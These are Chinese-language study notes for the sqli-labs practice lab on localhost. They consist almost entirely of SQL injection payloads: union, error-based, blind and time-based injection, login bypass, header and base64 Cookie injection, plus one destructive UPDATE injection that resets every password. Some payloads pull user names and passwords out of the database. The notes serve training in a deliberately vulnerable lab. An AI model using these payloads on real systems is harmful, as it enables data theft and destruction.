T1 字符型 单引号闭合(union select注入)
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3 %23
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3 --+
T2数字型(union select注入)
http://127.0.0.1/sqli-labs/Less-2/?id=1 and 1=2
http://127.0.0.1/sqli-labs/Less-2/?id=1 order by 3
http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,3
T3字符型 闭合: ('') (union select注入)
http://127.0.0.1/sqli-labs/Less-3/?id=1') --+
http://127.0.0.1/sqli-labs/Less-3/?id=-1') union select 1,2,3 --+
T4字符型 闭合: ("") (union select注入)
http://127.0.0.1/sqli-labs/Less-4/?id=1") --+
http://127.0.0.1/sqli-labs/Less-4/?id=-1") union select 1,2,3 --+
T5字符型 单引号闭合 布尔盲注/报错注入 (注意: updatexml/extractvalue 的报错回显最多只显示 32 个字符，结果过长时需配合 substr 分段读取)
http://127.0.0.1/sqli-labs/Less-5/?id=1' --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 1,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select username from users limit 1,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and (select database()='security') --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and (select ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)) > 100) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and (select table_name from information_schema.tables where table_schema='security' limit 0,1) --+
T6字符型 双引号闭合 报错注入/布尔盲注
http://127.0.0.1/sqli-labs/Less-6/?id=1" --+
http://127.0.0.1/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
T7 (本篇未记录 payload)
T8字符型 单引号闭合 布尔盲注
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (select database()='security') --+
T9字符型 单引号闭合 时间盲注
127.0.0.1/sqli-labs/Less-9/?id=1' and sleep(5) --+ //经过尝试 只有单引号可以成功执行 所以是单引号闭合
127.0.0.1/sqli-labs/Less-9/?id=2' and if((select database())="security",sleep(5),null) --+
T10字符型 双引号闭合 时间盲注
127.0.0.1/sqli-labs/Less-10/?id=1" and sleep(5) --+
127.0.0.1/sqli-labs/Less-10/?id=2" and if((select database())="security",sleep(5),null) --+
T11 POST注入 union select注入 单引号闭合
username:
' order by 2 #
' union select 1,2 #
' union select 1,database() #
' union select 1,table_name from information_schema.tables where table_schema="security" limit 0,1 #
' union select 1,table_name from information_schema.tables where table_schema="security" limit 3,1 #
' union select 1,column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1 #
' union select username,password from users limit 0,1 #
T12 POST注入 union select注入 闭合方式: ("")
") order by 2 #
") union select 1,2 #
T13 POST注入 闭合方式('')union select没有回显 报错注入/盲注
') #
') union select 1,2 #
') and updatexml(1,concat(0x7e,(select database()),0x7e),1) #
') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema="security" limit 0,1),0x7e),1) #
T14 POST注入 闭合方式"" union select没有回显 报错注入/盲注
" #
" order by 2 #
" union select 1,2 #
" and updatexml(1,concat(0x7e,(select database()),0x7e),1) #
" or updatexml(1,concat(0x7e,(select database()),0x7e),1) #
" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema="security" limit 0,1),0x7e),1) #
T15 POST注入 盲注 单引号闭合 方法2:构造万能密码
' or 1=1 # //四种组合中唯一成功的 说明闭合方式是单引号
' or updatexml(1,concat(0x7e,(select database()),0x7e),1) # //报错注入没有回显 则接下来用盲注方式
' or (select database()='security') #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))>100) #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))>110) #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))<105) #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))<102) #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))=101) #
' or (select substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1) = 'e') #
' or '1'='1
T16 POST注入 盲注 闭合方式: ("") 方法2:构造万能密码
") or 1=1 #
") or (select database()='security') #
") or ("1")=("1
T17 POST注入 密码重置 (UPDATE 语句注入)
username: admin    password: ' or 1=1 # //password 字段注入后 # 注释掉了 UPDATE 后面的 WHERE 条件，因此 UPDATE 作用于全表，所有用户的密码都被重置成了 1 ('' or 1=1 的运算结果)。此操作具有破坏性，只应在本地靶场执行
T18 POST注入 HTTP头注入之User-Agent注入
User-Agent的测试不能用注释符号 (注入点后面还有其他字段，注释会破坏语句，需用 and '1'='1 的方式重新闭合)
测试发现闭合是单引号
' and '1'='1
' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1
' and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '1'='1
T19 POST注入 HTTP头注入之Referer注入
' and '1'='1
' and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '1'='1
T20 POST注入 Cookie注入
' #
' or extractvalue(1,concat(0x7e,(select database()),0x7e)) #
admin' and extractvalue(1,concat(0x7e,(select database()),0x7e)) #
' or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema="security" limit 0,1),0x7e)) #
' or extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e)) #
T21 POST注入 Cookie注入变形 闭合('')
(所有的内容都经过 base64 编码以后再提交即可; base64 只是编码而不是加密，不提供任何保护)
\ XA==
') # JykgIw==
') or extractvalue(1,concat(0x7e,(select database()),0x7e)) # Jykgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSwweDdlKSkgIw==
admin') and extractvalue(1,concat(0x7e,(select database()),0x7e)) # YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSwweDdlKSkgIw==
uname=') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) or ('1')=('1   //此处为明文形式，放入 uname Cookie 前同样需要先 base64 编码
T22 POST注入 Cookie注入变形 闭合 ""
(所有的内容都经过 base64 编码以后再提交即可; base64 只是编码而不是加密)
\ XA==
" # IiAj
" or extractvalue(1,concat(0x7e,(select database()),0x7e)) # IiBvciBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSAj
admin" or extractvalue(1,concat(1,concat(0x7e,(select database()),0x7e),1)) # YWRtaW4iIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZGF0YWJhc2UoKSksMHg3ZSksMSkpICM=
admin" and extractvalue(1,concat(0x7e,(select database()),0x7e)) and "1"="1 YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSBhbmQgIjEiPSIx